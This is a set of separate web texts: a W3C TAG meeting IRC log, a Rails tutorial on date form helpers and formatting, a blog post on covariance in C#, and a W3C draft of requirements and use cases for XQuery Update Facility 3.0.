[noah] 19:20:04 [timbl] Noah: Look at the history. We closed in in 2003 - Chris L in 2003 -- the TAG closed it in 2003 19:20:24 [timbl] Noah: In 2008, on Dec 9, we re-opened it specifically about HTML5 Tag Soup. 19:20:36 [timbl] ... So HT's commet does indeed carry they day. 19:21:02 [timbl] Tim: Suggest open, work hapeniung in XML HTML task force. 19:21:08 [timbl] q+ 19:22:02 [masinter] mark it as "PENDING REVIEW"? 19:24:44 [ht] It appears that @ping has been removed from HTML5[W3C], remains in HTML[WHATWG], but is not receiving much (any?) implementation 19:25:12 [noah] Added note to ISSUE-7: Reviewed status of this at 10 Feb 2011 (8-10 Feb) F2F. Decided to leave this open for now, pending better understanding of where the XML/HTML Unification Task force is going with related issues. 19:25:21 [ht] This is from HTML WG issue 1 19:25:23 [noah] s/7/20/ 19:25:38 [timbl] ---------- 19:25:45 [timbl] Noah: What aboutIssue-24 19:25:53 [timbl] Larry: Lets leave it open 19:26:03 [timbl] Noah: Issue-25 Deep Linking -- any actions 19:26:19 [timbl] DKA: I made a very sketchy draft I made -- neeeds discussion 19:26:38 [timbl] Noah: Stays open, yuo have an action for it. 19:26:48 [DKA] 19:27:06 [timbl] JAR: Issue 31 is was re-opened for UMP. 19:28:40 [timbl] Noah: Issue-31 stays open. ACTIOn344 now is asscoited with it 19:29:12 [masinter] issue-31? 19:29:12 [trackbot] ISSUE-31 -- Should metadata (e.g., versioning information) be encoded in URIs? -- open 19:29:12 [trackbot] 19:31:56 [DKA] 19:32:26 [timbl] Noah: We close ss as no objections heard 19:32:31 [masinter] issue-33? 19:32:31 [trackbot] ISSUE-33 -- Composability for user interface-oriented XML namespaces -- open 19:32:31 [trackbot] 19:32:36 [noah] RESOLUTION: Closing ISSUE-33 because CDF is gone, and any concerns about SVG, MathML, etc. in HTML are being tracked elsewhere. 19:32:41 [noah] close ISSUE-33 19:32:41 [trackbot] ISSUE-33 Composability for user interface-oriented XML namespaces closed 19:32:56 [timbl] ------------ 19:33:00 [masinter] issue-34? 19:33:00 [trackbot] ISSUE-34 -- XML Transformation and composability (e.g., XSLT,XInclude, Encryption) -- open 19:33:00 [trackbot] 19:33:04 [timbl] Issue-37? 19:33:04 [trackbot] ISSUE-37 -- Definition of abstract components with namespace namesand frag ids -- open 19:33:04 [trackbot] 19:33:10 [masinter] issue-39? 19:33:10 [trackbot] ISSUE-39 -- Meaning of URIs in RDF documents -- open 19:33:10 [trackbot] 19:33:25 [noah] "The community needs: 19:33:25 [noah] A concise statement of the above architectural elements from different specs in one place, written in terms which the ontology community will understand, with pointers to the relevant specifications." 19:35:32 [timbl] JAR: I wondered aboit opening an Issue for Harry Halpin's concerns. The problem with doing # or 303. 19:38:26 [timbl] timbl: Let's not re-define issues udner the same number, taht sis fraud :-) 19:43:41 [noah] ACTION: Jonathan to propose changes to status of issue-39 & issue-57, and perhaps opening new issue relating to H. Halpin's concerns about 200 responses Due: 2011-02-22 19:43:41 [trackbot] Created ACTION-532 - Propose changes to status of issue-39 & issue-57, and perhaps opening new issue relating to H. Halpin's concerns about 200 responses Due: 2011-02-22 [on Jonathan Rees - due 2011-02-17]. 19:45:23 [noah] topic: assembling the minutes 19:45:26 [noah] Day 1: Dan 19:45:30 [noah] Day 2: Larry 19:45:44 [noah] Day 3: Henry 19:45:48 [timbl] BREAK 19:46:04 [timbl] RBEKA 19:51:28 [DKA] DKA has joined #tagmem 19:58:52 [Ashok] Ashok has joined #tagmem 20:06:06 [timbl] </break? 20:06:21 [timbl] Noah: Now going through action items 20:06:36 [noah] 20:06:46 [timbl] Noah: Now going through action items 20:07:50 [masinter] masinter has joined #tagmem 20:07:57 [timbl] Action-505? 20:07:57 [trackbot] ACTION-505 -- Daniel Appelquist to start a document wrt issue-25 -- due 2011-01-25 -- OPEN 20:07:57 [trackbot] 20:08:12 [timbl] DKA: Do we need a TAG finding here? 20:08:31 [timbl] Noah: Take us to the point where we are ready for discussion. 20:09:07 [timbl] DKA: I need someone to help me on this 20:09:16 [timbl] JAR: We could talk. 20:09:48 [noah] At Feb 2011 F2F, Jonathan agrees to give Dan a bit of help. Next goal is for them to take us to the point where we are ready for telcon discussion. 20:10:10 [noah] ACTION-505 Due 2011-03-01 20:10:10 [trackbot] ACTION-505 Start a document wrt issue-25 due date now 2011-03-01 20:10:22 [timbl] Action-507? 20:10:22 [trackbot] ACTION-507 -- Daniel Appelquist to with Noah to suggest next steps for TAG on privacy -- due 2011-03-01 -- OPEN 20:10:22 [trackbot] 20:10:49 [timbl] DKA: We didn't come up with a product page for the over-arching product on privacy. 20:11:24 [timbl] Noah: The product page is to define work the TAG will do. 20:11:46 [timbl] action cotinues. 20:11:46 [trackbot] Sorry, bad ACTION syntax 20:12:33 [noah] ACTION-460 Due 2011-03-08 20:12:33 [trackbot] ACTION-460 Coordinate with IAB regarding next steps on privacy policy due date now 2011-03-08 20:13:02 [noah] ACTION-480 Due 2011-03-01 20:13:02 [trackbot] ACTION-480 Draft overview document framing Web applications as opposed to traditional Web of documents Due: 2010-11-01 due date now 2011-03-01 20:14:23 [noah] ACTION-116? 20:14:23 [trackbot] ACTION-116 -- Tim Berners-Lee to align the tabulator internal vocabulary with the vocabulary in the rules, getting changes to either as needed. -- due 2011-02-11 -- OPEN 20:14:23 [trackbot] 20:14:59 [noah] JAR: Tim took this on himself, up to him whether to proceed 20:15:19 [noah] TBL: OK, maybe this is overtaken by events 20:16:14 [noah] Agreed on Feb 10 2011 at F2F Jonathan will move this to become an AWWSW action 20:16:41 [noah] close ACTION-116 20:16:41 [trackbot] ACTION-116 Align the tabulator internal vocabulary with the vocabulary in the rules, getting changes to either as needed. closed 20:17:20 [noah] ACTION-510? 20:17:20 [trackbot] ACTION-510 -- Tim Berners-Lee to write a note conveying the TAG's concerns re: the microdata -> RDF URI mappings in the HTML5 microdata draft Due: 2011-01-20 -- due 2011-01-13 -- OPEN 20:17:20 [trackbot] 20:18:59 [noah] ACTION-510 Due 2011-03-09 20:19:00 [trackbot] ACTION-510 Write a note conveying the TAG's concerns re: the microdata -> RDF URI mappings in the HTML5 microdata draft Due: 2011-01-20 due date now 2011-03-09 20:19:23 [noah] John Kemp's action: 20:19:28 [noah] ACTION-355? 20:19:29 [trackbot] ACTION-355 -- John Kemp to explore the degree to which AWWW and associated findings tell the interaction story for Web Applications -- due 2011-02-02 -- OPEN 20:19:29 [trackbot] 20:20:20 [noah] ACTION-504? 20:20:20 [trackbot] ACTION-504 -- John Kemp to make sure ACTION-355 links all significant writings including use cases. -- due 2011-01-27 -- OPEN 20:20:20 [trackbot] 20:20:28 [noah] note that 504 is linked to 355 20:20:48 [noah] JK: Unclear whether anyone is interested. 20:23:30 [noah] NM: We could do a product page. Could be one with resource assigned and dates, or could be a partial product page, with blanks for assigned resource and dates 20:23:57 [noah] JK: Originally, the idea was to fill out a piece that is called out as missing in AWWW, I.e. to cover non-HTTP interactions. 20:24:10 [noah] JK: I think that's where Noah's original succession 20:24:21 [noah] JAR: At least, let's not let this get lost 20:25:00 [johnk] johnk has joined #tagmem 20:25:09 [johnk] s/succession/suggestion/ 20:28:42 [timbl] 20:30:07 [noah] close ACTION-504 20:30:07 [trackbot] ACTION-504 Make sure ACTION-355 links all significant writings including use cases. closed 20:30:17 [noah] ACTION-416? 20:30:17 [trackbot] ACTION-416 -- John Kemp to work on diagrams in "From Server-side to client-side" section of webapps material -- due 2011-03-01 -- OPEN 20:30:17 [trackbot] 20:30:39 [noah] JK: That's in Ashok's Web App document. I've made no recent progress. 20:31:05 [noah] JK: What to do whether you will work on future Web applications document. Ashok now has control of the pertinent document. 20:31:35 [noah] NM: Ashok, do you have an action associated with that. 20:33:17 [johnk] 20:34:21 [johnk] ACTION-417? 20:34:21 [trackbot] ACTION-417 -- John Kemp to frame section 7, security -- due 2011-01-25 -- CLOSED 20:34:21 [trackbot] 20:34:26 [noah] 20:36:20 [noah] close ACTION-416 20:36:20 [trackbot] ACTION-416 Work on diagrams in "From Server-side to client-side" section of webapps material closed 20:36:50 [noah] ACTION-508? 20:36:50 [trackbot] ACTION-508 -- Larry Masinter to draft proposed bug report regarding interpretation of fragid in HTML-based AJAX apps Due: 2011-01-03 -- due 2011-02-22 -- OPEN 20:36:50 [trackbot] 20:37:33 [noah] LM: Discussed Tues. 20:37:40 [noah] ACTION-531? 20:37:40 [trackbot] ACTION-531 -- Larry Masinter to write draft document on architectural good practice relating to registries Due 2011-04-19 -- due 2011-02-17 -- OPEN 20:37:40 [trackbot] 20:38:04 [noah] ACTION-515? 20:38:04 [trackbot] ACTION-515 -- Larry Masinter to (as trackbot proxy for John) who will publish, slightly cleaned up, with help from Noah and Larry Due: 2011-03-07 -- due 2011-02-15 -- OPEN 20:38:04 [trackbot] 20:38:31 [noah] ACTION-525? 20:38:31 [trackbot] ACTION-525 -- Noah Mendelsohn to check with John before closing WebApps access control -- due 2011-02-17 -- OPEN 20:38:31 [trackbot] 20:38:56 [noah] ACTION-529? 20:38:56 [trackbot] ACTION-529 -- Noah Mendelsohn to schedule telcon discussion of a potential TAG product relating to offline applications and packaged Web -- due 2011-02-17 -- OPEN 20:38:56 [trackbot] 20:39:19 [noah] close ACTION-513 20:39:19 [trackbot] ACTION-513 Do F2F agenda closed 20:39:42 [noah] ACTION-501? 20:39:42 [trackbot] ACTION-501 -- Noah Mendelsohn to follow up on whether GeoLocation finds reasonable answer on giving permission per site/app etc [self-assigned] -- due 2011-03-01 -- OPEN 20:39:42 [trackbot] 20:40:04 [noah] ACTION-379? 20:40:04 [trackbot] ACTION-379 -- Noah Mendelsohn to check whether HTML language reference has been published -- due 2011-02-08 -- OPEN 20:40:04 [trackbot] 20:42:07 [noah] ACTION-379 Due 2011-03-09 20:42:07 [trackbot] ACTION-379 Check whether HTML language reference has been published due date now 2011-03-09 20:42:34 [masinter] why isn't this document listed in 20:45:01 [noah] ACTION-344? 20:45:01 [trackbot] ACTION-344 -- Jonathan Rees to alert TAG chair when CORS and/or UMP goes to LC to trigger security review -- due 2011-02-15 -- OPEN 20:45:01 [trackbot] 20:45:07 [noah] Leave for now, moving ahead. 20:45:13 [noah] ACTION-532? 20:45:13 [trackbot] ACTION-532 -- Jonathan Rees to propose changes to status of issue-39 & issue-57, and perhaps opening new issue relating to H. Halpin's concerns about 200 responses Due: 2011-02-22 -- due 2011-02-17 -- OPEN 20:45:13 [trackbot] 20:45:24 [noah] ACTION-381? 20:45:24 [trackbot] ACTION-381 -- Jonathan Rees to spend 2 hours helping Ian with -- due 2011-02-11 -- OPEN 20:45:24 [trackbot] 20:45:53 [noah] ACTION-509? 20:45:53 [trackbot] ACTION-509 -- Jonathan Rees to communicate with RDFa WG regarding documenting the fragid / media type issue -- due 2011-01-29 -- OPEN 20:45:53 [trackbot] 20:46:08 [noah] JAR: I've been working with Manu 20:46:17 [noah] ACTION-509 Due 2011-03-15 20:46:17 [trackbot] ACTION-509 Communicate with RDFa WG regarding documenting the fragid / media type issue due date now 2011-03-15 20:46:20 [noah] ACTION-509 Due 2011-02-15 20:46:21 [trackbot] ACTION-509 Communicate with RDFa WG regarding documenting the fragid / media type issue due date now 2011-02-15 20:46:50 [noah] ACTION-477? 20:46:50 [trackbot] ACTION-477 -- Henry S. Thompson to organize meeting on persistence of domains -- due 2011-03-15 -- OPEN 20:46:50 [trackbot] 20:47:12 [noah] ACTION-33? 20:47:12 [trackbot] ACTION-33 -- Henry S. Thompson to revise naming challenges story in response to Dec 2008 F2F discussion -- due 2011-01-31 -- OPEN 20:47:12 [trackbot] 20:48:02 [noah] ACTION-33 Due 2011-03-08 20:48:02 [trackbot] ACTION-33 revise naming challenges story in response to Dec 2008 F2F discussion due date now 2011-03-08 20:48:51 [noah] ACTION-440? 20:48:51 [trackbot] ACTION-440 -- Henry S. Thompson to ask Hixie what is meant in this [section 9.2] by "retrieving an external entity" and could some clarification be added. -- due 2011-02-01 -- OPEN 20:48:51 [trackbot] 20:49:28 [noah] ACTION-440 Due 2011-02-22 20:49:28 [trackbot] ACTION-440 Ask Hixie what is meant in this [section 9.2] by "retrieving an external entity" and could some clarification be added. due date now 2011-02-22 20:49:49 [noah] ACTION-23? 20:49:49 [trackbot] ACTION-23 -- Henry S. Thompson to track progress of #int bug 1974 in the XML Schema namespace document in the XML Schema WG -- due 2011-01-19 -- OPEN 20:49:49 [trackbot] 20:50:16 [noah] HT: Reviewed state of this, saw something on the XML Schema mailing list implying done, but found closed in error. 20:50:32 [noah] HT: The bit we care about still hasn't been, I'm still monitoring. 20:50:45 [noah] ACTION-23 Due 2011-05-01 20:50:45 [trackbot] ACTION-23 track progress of #int bug 1974 in the XML Schema namespace document in the XML Schema WG due date now 2011-05-01 20:51:34 [noah] topic: Pending review actions 20:51:39 [noah] ACTION-421? 20:51:39 [trackbot] ACTION-421 -- Henry S. Thompson to frame the discussion of EXI deployment at a future meeting -- due 2011-01-21 -- PENDINGREVIEW 20:51:39 [trackbot] 20:51:46 [noah] HT: I was asked to find out the deal on deployment. 20:52:16 [noah] HT: Sent a note to the list and got an answer from John Schneider. Please schedule discussion. 20:52:54 [noah] ACTION-511? 20:52:55 [trackbot] ACTION-511 -- Larry Masinter to send email framing TAG work on registries -- due 2011-01-20 -- PENDINGREVIEW 20:52:55 [trackbot] 20:53:49 [noah] LM: I took another ACTION-531, close ACTION-511 20:54:46 [noah] close ACTION-511 20:54:46 [trackbot] ACTION-511 Send email framing TAG work on registries closed 20:55:03 [noah] ACTION-512? 20:55:03 [trackbot] ACTION-512 -- Noah Mendelsohn to do F2F local arrangements -- due 2011-01-27 -- PENDINGREVIEW 20:55:03 [trackbot] 20:55:07 [noah] close ACTION-512 20:55:07 [trackbot] ACTION-512 Do F2F local arrangements closed 21:00:01 [noah] ACTION: Noah to schedule TAG discussion of !# (check with Yves) [self-assigne] 21:00:01 [trackbot] Created ACTION-533 - Schedule TAG discussion of !# (check with Yves) [self-assigne] [on Noah Mendelsohn - due 2011-02-17]. 21:05:31 [DKA] DKA has joined #tagmem 21:07:07 [noah] topic: EXI 21:07:37 [noah] scribenick: noah 21:11:25 [noah] HT: There are 3 implementations linked from the home page, 1 proprietary, 2 open source. 21:31:53 [jar] q+ dka to talk about exi 21:32:08 [ht] q- masinter 21:35:24 [ht] ack timbl 21:35:30 [ht] ack dka 21:35:30 [Zakim] dka, you wanted to talk about exi 21:47:27 [noah] We are adjourned 21:50:18 [jar] jar has joined #tagmem 22:07:58 [timbl] timbl has joined #tagmem 22:10:26 [ndw] ndw has joined #tagmem 22:57:16 [Norm] Norm has joined #tagmem
http://www.w3.org/2011/02/10-tagmem-irc
CC-MAIN-2015-06
en
refinedweb
Date handling is one of the web’s inevitables. Almost any web application you write is going to include some form of date-bound hacking. Whether it’s capturing user input via a web form, calculating the difference between two times, or fetching data via a date range, time and the web are closely linked. Luckily for us, Rails make handling dates and times, like everything else, fairly trivial; that is, once you have an idea of how everything works. I recently rewrote the section of our admin site in Rails that handles the creation of back issues. Since I had to hunt all over the web for a complete package of documentation to finalize this small task I thought it might be a good idea to share my experience. In the interest of time we’ll assume you have a Rails app up and running and have controllers and models in place that you’re looking to add date-handling code to. Form Helpers Let’s start with data capture via a simple web form. When storing a back issue in the database the most important data we need to capture is its print date. As far as our back issues are concerned, print date is just a month and a year. To accomplish this, Rails provides a few FormHelpers for picking dates that we’ll use in our view. /app/view/back_issues/new.rhtml <%= error_messages_for :back_issue %> <% form_for :back_issue do |f| %> Print Month: <%= select_month(Date.today, :field_name => "print_month") %> Print Year: <%= select_year(Date.today, :start_year => 1999, :field_name => "print_year") %> <%= submit_tag value='Create Backissue' %> <% end %> select_month() and select_year() generate pulldown menus for picking the issue’s month and year. Pay special attention the :field_name option. It’s not documented well in the Rails API proper and will come in handy when you need to change the name of these select boxes to something other than the default of date[month] and date[year]; necessary if you are using multiple instances of these helpers in a single form. :field_name date[month] date[year] For still greater control over a date submitted via a form, you might want to take look at select_datetime, which provides a pulldown for each element of a timestamp. Or for something a little more user friendly, check out the really nice Protoype-based Calendar Date Select. Storing the Data There’s no real reason for us to store the values from these two fields in separate database columns. Rather we’ll use the month and year values to construct a date in the controller and store the result in a single datetime field called print_date. print_date /app/controllers/back_issue_controller.rb class BackIssuesController < ApplicationController def new @back_issue = BackIssue.new(params[:back_issue]) return unless request.post? @back_issue.print_date = Date.new(params[:date]['print_year'].to_i, params[:date]['print_month'].to_i) @back_issue.save! flash[:notice] = "New back issue created." redirect_to "/covers/new?bi=" + @back_issue.id.to_s # In the event our validations fail rescue ActiveRecord::RecordInvalid render :action => 'new' end end Ok, that should do it. Once we’ve created an instance of @back_issue with the parameters from the form, we have access to print_date and can give it a newly constructed datetime with Date.new(). @back_issue Date.new() Date.new() can take three parameters (year, month, day). We’re taking the default of 1 on the day parameter by not passing anything to the method. In this example, we’re really only concerned with the month and year so the default is fine. In reality, the new() method on our BackIssuesController is actually a bit more complex than this– hence the params[:back_issue] — but for the sake of simplicity, we’re just showing how to push a new date into the publish_date column from pulldown menus. new() params[:back_issue] publish_date The redirect_to in this case point to our cover upload form, but you can point it to whatever destination you like following a successful save!. redirect_to save! Manipulating Dates We don’t actually need to modify the date after it’s submitted to our controller, but if we did, Ruby has a few operators for quickly adjusting a Date object. Pretty simple stuff. To demonstrate, let’s take these operators for a spin on the console. console >> d = Date.new(2007, 8, 23) => # >> d.to_s => "2007-08-23" >> yesterday = d-1 => # >> yesterday.to_s => "2007-08-22" >> tomorrow = d+1 => # >> tomorrow.to_s => "2007-08-24" >> lastmonth = d<<1 => # >> lastmonth.to_s => "2007-07-23" >> nextmonth = d>>1 => # >> nextmonth.to_s => "2007-09-23" Displaying Dates Alright, now that we’ve written our back issue date to the database, all that’s left to do is display it in a view. We probably don’t want to display the date formatted as it’s stored: ‘YYYY-MM-DD’. Rather we want something like the current back issue page that displays the full month name and the year. To accomplish this we’ll use strftime(). strftime() If you’re familiar with PHP’s date() method, strftime() is similar, you pass the method a format string that defines how you want the date output. The difference is that while you pass PHP’s date() both a format and a timestamp, strftime() is a method that operates on a Date object. And everything in Rails is an object. date() Date Rails automatically knows to treat our datetime columns in the database as Date objects, so, after you’ve fetched the back issue data from the database in the controller, formatting the date in the view is as simple as: <%= @back_issue.print_date.strftime('%B %Y') %> Which will print something like “January 2007″ to the screen. For a full list of format codes for strftime(), see the table below. Rails Magic Wishlist And that’s about it. Not too difficult but it’s actually a little more work that I’d like to do. Frankly, I wish there was some Rails magic that did the date handling in the controller for me. Creating a new date and casting parameters in the controller isn’t how I’d like this to function — ultimately it doesn’t strike me as terribly DRY. Rather, I would like to have the option of passing the form fields to the controller as back_issue[print_date_month] and back_issue[print_date_year] and have Rails realize that these are components of my print_date field and compile these elements into a date for me. But all-in-all the solution we have here is reasonably clean and maybe I can build some of that magic into a plugin or helper at a later date. back_issue[print_date_month] back_issue[print_date_year]
http://www.linux-mag.com/id/4070/
CC-MAIN-2015-06
en
refinedweb
Covariance and Contravariance are terms used in programming languages and set theory to define the behaviour of parameter and return types of a function. Yes, that’s a mouthful, but in a nutshell: - Covariance mandates that the return type and the parameters of a function must be a subtype of the original base class type for any superclass - Contravariance allows the return type and/or the parameter types to be super-types of the defined types and not necessarily sub-types Nothing better than using an example: 1: public abstract class Animal 2: { 3: Animal CreateChild(); 4: } 5: 6: public class Human : Animal 7: { 8: Animal CreateChild( return new Human(); } 9: } 10: 11: public class Dog : Animal 12: { 13: Dog CreateChild( return new Dog(); } 14: } In this example: - Animal is a superclass. - Human is a subclass of Animal, with a covariant (no change) override to the CreateChild method to return the looser type Animal - Dog is a subclass of Animal, with a contravariant override to the CreateChild method to return the stronger type Dog More reading on Eric Lippert’s blog series on Covariance and Contravariance in C# EDIT: I thought it best prudent that I clarify that this is only one example of where variance is used. Method signatures, delegates and arrays are some more examples of where the theory of co and contra variance can be found.
http://www.xerxesb.com/2008/coveriance-and-contravariance/
CC-MAIN-2015-06
en
refinedweb
Copyright © 2012 W3C® (MIT, ERCIM, Keio), All Rights Reserved. W3C liability, trademark and document use rules apply. This document specifies goals, requirements and use cases for the XQuery Update Facility was developed by the W3C XML Query Working Group, which is part of the XML Activity. The Working Group expects to eventually publish this document as a Working Group Note. This document includes, for each requirement, a corresponding status, indicating the current situation of the requirement in XQuery Update Facility 3.0 at the time that it was issued as a Working Draft in December 2011. Organizations and individuals should review this document to determine whether or not the requirements provided meet the needs of the full-text community. If additional requirements are identified, they may be added to these requirements in a future publication. Three status levels are used: This indicates that the requirement, according to its original formulation, has been completely met. Optional clarificatory text may follow. This indicates that the requirement has been partially met according to its original formulation. When this status is indicated, explanatory text is provided to better clarify the current scope of the requirement. This indicates that the requirement, according to its original formulation, has not been met. If this is the case, explanatory text is provided. This document also incorporates a number of Use Cases that assist the Working Groups in determining whether a candidate requirement is, in fact, a real requirement and illustrating various problems that XQuery Update Facility 3.0 is intended to address. “[UPD Goals 2 Usage Scenarios 3 Requirements 3.1 Terminology 3.2 General Requirements 3.3 Relationship to XQuery 3.0 3.4 XML Query Update Functionality 3.5 Transaction characteristics 4 Use Cases for XQuery Update Facility 3.0 4.1 Use Case "R" - Updating Relational Data 4.1.1 Description 4.1.2 XML Schemas 4.1.2.1 Schema for users.xml 4.1.2.2 Schema for items.xml 4.1.2.3 Schema for bids.xml 4.1.3 Input Data 4.1.4 Updates and Results 4.1.4.1 Q1 4.1.4.2 Q2 4.1.4.3 Q3 4.2 Use case "Wiki" - traversing a set of Wiki pages 4.2.1 Input data 4.2.2 Q1 This document describes the] The following usage scenarios describe how the XQuery Update Facility 3.0 may be used in various environments, and represent a wide range of activities and needs that illustrate the problem space to be addressed. They are intended to be used as design cases during the development of the XQuery Update Facility 3.0, and should be reviewed when critical decisions are made. These usage scenarios should also prove useful in helping non-members of the XML Query Working Group understand the intent and goals of the project. Modify XML in persistent XML stores, including native XML databases, XML files stored on a file system, or XML stored in SQL databases. Modify XML messages to change status and add information created while processing the message. Add new data to an existing XML document; for instance, add a new entry to a BLOG or a data log. Perform updates on configuration files, user profiles, or administrative logs represented in XML. Create a new copy of an XML document or subtree that differs from the original in the way specified by the update. For instance, updates could be used to modify a web message in order to add new information and change headers to reflect the modified status. Modifying XML views of non-XML sources, such as an [SQL/XML] view of a SQL database. XQuery Update Facility 3.0 MUST be backwards compatible with [XQuery Update Facility 1.0]. Status: this requirement has not been met. The XQuery Update Facility 3.0 MUST be defined on the [XQuery and XPath Data Model (XDM) 3.0]. Status: this requirement has not been met. Note: The properties of a Data Model instance that can be modified by the XQuery Update Facility 3.0 are discussed in 3.4 XML Query Update Functionality. The XQuery Update Facility 3.0 MUST be based on [XQuery 3.0: An XML Query Language]. The XQuery Update Facility 3.0 MUST use XQuery 3.0 to identify items to be updated. The XQuery Update Facility 3.0 MUST use XQuery 3.0 to specify items used in the updates. Status: this requirement has not been met. The XQuery Update Facility 3.0 MAY support an explicit XML Schema validation operation that preserves node identity. This requirement has not been met according to its original formulation; however, the revalidation mode can be set to ensure that type information is recovered and the resulting document is valid according to the governing schema. Note: The XQuery 3.0 validate expression creates a new copy of each validated node, with a new identity. This requirement involves preservation of identity. The XQuery Update Facility 3.0 MAY be compositional with respect to XQuery 3.0 expressions; that is, it may be possible to use an update wherever an XQuery 3.0 expression is used. Status: this requirement has not been met. Updating expressions are limited to specific syntactic contexts. The XQuery Update Facility 3.0 MUST be able to support expressions that return both a non-empty XDM instance and a non-empty pending update list. Status: this requirement has not been met. In this section, the terms Atomicity, Consistency, Isolation, and Durability are taken from the ACID model of transaction characteristics for databases, which is described in [Transaction Processing Concepts and Techniques]. At the end of an outermost update operation (that is, an update operation invoked from the external environment), the data model MUST be consistent with respect to the constraints specified in the Data Model 3.0. In particular, all type annotations MUST be consistent with the content of the items they govern. Status: this requirement has been met. The XQuery Update Facility 3.0 MAY define additional levels of granularity at which Data Model 3.0 constraints are enforced. Status: this requirement has not been met. The XQuery Update Facility 3.0 MUST not preclude the means by which operations can be isolated from concurrent operations. Status: this requirement has not been met. The XQuery Update Facility 3.0 MUST not preclude a means to control the durability of atomic operations and atomic execution units. Status: this requirement has not been met. The use cases listed below were created by the XML Query Working Group to illustrate important applications for an XML update facility. Each use case is focused on a specific application area, and contains a Document Type Definition (DTD) and example input data. Each use case specifies a set of updates that might be applied to the input data, and the expected resulting value of the modified input for each update. Since the English description of each query is concise, the expected results form an important part of the definition of each update directive. These use cases are inspired by section 3 Requirements. These use cases represent a snapshot of an ongoing work. Some important application areas and important operations XQuery Update Facility to be created by the XML Query Working Group. One important use of an XML update language will be to update data stored in relational databases. This use case describes a set of such possible updates. This use case is based on performing updates on the data used in Use Case "R" from the [XML Query Use Cases]. The sample data from this Use Case is copied below for convenience, and exactly match the data found in the XQuery 1.0 Use Cases. Instead of DTDs, we describe this data with W3C XML Schemas. The data represents schemas: <:element <xs:element </xs:schema> The following data is an excerpt of the initial state for Q1. In this particular use case, each update begins with the state resulting from the prior update. <items> <item_tuple> <itemno>1001</itemno> <description>Red Bicycle</description> <offered_by>U01</offered_by> <start_date>1999-01-05</start_date> <end_date>1999-01-20</end_date> <reserve_price>40</reserve_price> </item_tuple> ... Snip ... </items> <users> <user_tuple> <userid>U01</userid> <name>Tom Jones</name> <rating>B</rating> </user_tuple> ... Snip ... </users> <bids> <bid_tuple> <userid>U02</userid> <itemno>1001</itemno> <bid>35</bid> <bid_date>1999-01-07</bid_date> </bid_tuple> <bid_tuple> ... Snip ... </bids> The entire data set is represented by the following tables: The underlying database system has the following referential integrity constraints: A foreign key on the BIDS table requires that BIDS.USERID contains a value that is found in USERS.USERID A foreign key on the BIDS table requires that BIDS.ITEMNO contains a value that is found in ITEMS.ITEMNO Insert a new bid for Roger Smith on item 1002, adding 10% to the best bid received so far for this item, and report back what bid was just entered. Solution in the XQuery Update Facility: let $uid := doc("users.xml")/users/user_tuple[name = "Roger Smith"]/userid let $topbid := max(doc("bids.xml")/bids/bid_tuple[itemno = 1002]/bid) let $newbid := $topbid * 1.1 return ( insert nodes <bid_tuple> <userid>{ data($uid) }</userid> <itemno>1002</itemno> <bid>{ $newbid }</bid> <bid_date>1999-03-03</bid_date> </bid_tuple> into doc("bids.xml")/bids, <new_bid>{ $newbid }</new_bid> ) Expected Result: The best bid for item 1002 had been at 1200, thus Roger's bid is at 1320. <new_bid>1320</new_bid> Expected resulting content of bids.xml: <bids> <bid_tuple> <userid>U02</userid> <itemno>1001</itemno> <bid>35</bid> <bid_date>1999-01-07</bid_date> </bid_tuple> ... Snip ... <bid_tuple> <userid>U01</userid> <itemno>1002</itemno> <bid>400</bid> <bid_date>1999-02-14</bid_date> </bid_tuple> ... Snip ... <bid_tuple> <userid>U04</userid> <itemno>1007</itemno> <bid>225</bid> <bid_date>1999-02-12</bid_date> </bid_tuple> ... Snip ... <bid_tuple> <userid>U04</userid> <itemno>1002</itemno> <bid>1320</bid> <bid_date>1999-03-03</bid_date> </bid_tuple> </bids> Place a bid for Roger Smith on item 1007, adding 10% to the best bid received so far on that item, but only if the bid amount does not exceed a given limit. Otherwise return the current top bid. Solution in the XQuery Update Facility:, <new_bid>{ $newbid }</new_bid> ) else ( <top_bid>{ $topbid }</top_bid> ) Expected Result: Adding 10% to the best bid on item 1007 would require a bid of 247.5, which is more than the allowed limit of 240. Thus, the bids.xml document does not change. <top_bid>225</top_bid> Erase user Dee Linquent and the corresponding associated items and bids. Return a count of the items and bids deleted. Solution in the XQuery Update Facility: let $user := doc("users.xml")/users/user_tuple[name = "Dee Linquent"] let $items := doc("items.xml")/items/item_tuple[offered_by = $user/userid] let $bids := doc("bids.xml")/bids/bid_tuple[userid = $user/userid] return ( delete nodes ($user, $items, $bids), <deleted> <items>{ count($items) }</items> <bids>{ count($bids) }</bids> </deleted> ) Expected Result: <deleted> <items>2</items> <bids>2</bids> </deleted> Expected resulting content of items.xml: <items> <item_tuple> <itemno>1001</itemno> <description>Red Bicycle</description> <offered_by>U01</offered_by> <start_date>1999-01-05</start_date> <end_date>1999-01-20</end_date> <reserve_price>40</reserve_price> </item_tuple> ... Snip ... <item_tuple> <itemno>1004</itemno> <description>Tricycle</description> <offered_by>U01</offered_by> <start_date>1999-02-25</start_date> <end_date>1999-03-08</end_date> <reserve_price>15<> Expected resulting content of users.xml: <users> <user_tuple> <userid>U01</userid> <name>Tom Jones</name> <rating>B</rating> </user_tuple> <user_tuple> <userid>U02</userid> <name>Mary Doe</name> <rating>A</rating> </user_tuple> <user_tuple> <userid>U04</userid> <name>Roger Smith</name> <rating>C</rating> </user_tuple> ... Snip ... <user_tuple> <userid>U06</userid> <name>Rip Van Winkle</name> <rating>B</rating> </user_tuple> </users> Expected resulting content of bids.xml: > ... Snip ... <bid_tuple> <userid>U02</userid> <itemno>1002</itemno> <bid>600</bid> <bid_date>1999-02-16</bid_date> </bid_tuple> <bid_tuple> <userid>U04</userid> <itemno>1002</itemno> <bid>1000</bid> <bid_date>1999-02-25</bid_date> </bid_tuple> ... Snip ... <bid_tuple> <userid>U04</userid> <itemno>1007</itemno> <bid>225</bid> <bid_date>1999-02-12</bid_date> </bid_tuple> </bids> This scenario demonstrates the use of an updating function that returns a non-empty XDM instance. The recursive function traverses a set of html documents by following the href attributes, returning an index structure representing the linkage hierarchy. The function also updates a list of visited documents in order to avoid a document being visited more than once. Note: This use case requires side-effects in the language and so is unlikely to be supported. It may be removed in a future draft of this document. Documentation.html: The top level Wiki page. <html> <head><title>Documentation</title></head> <body> <h1>Contents</h1> <ul> <li><a href="section1.html">Section 1</a></li> <li><a href="section2.html">Section 2</a></li> </ul> </body> </html> section1.html: <html> <head><title>Section 1</title></head> <body> <h1>First</h1> <p>Some interesting detail. More in the <a href="section1a.html">next section</a></p> <p>Back to the <a href="Documentation.html">index page</a></p> </body> </html> section1a.html: <html> 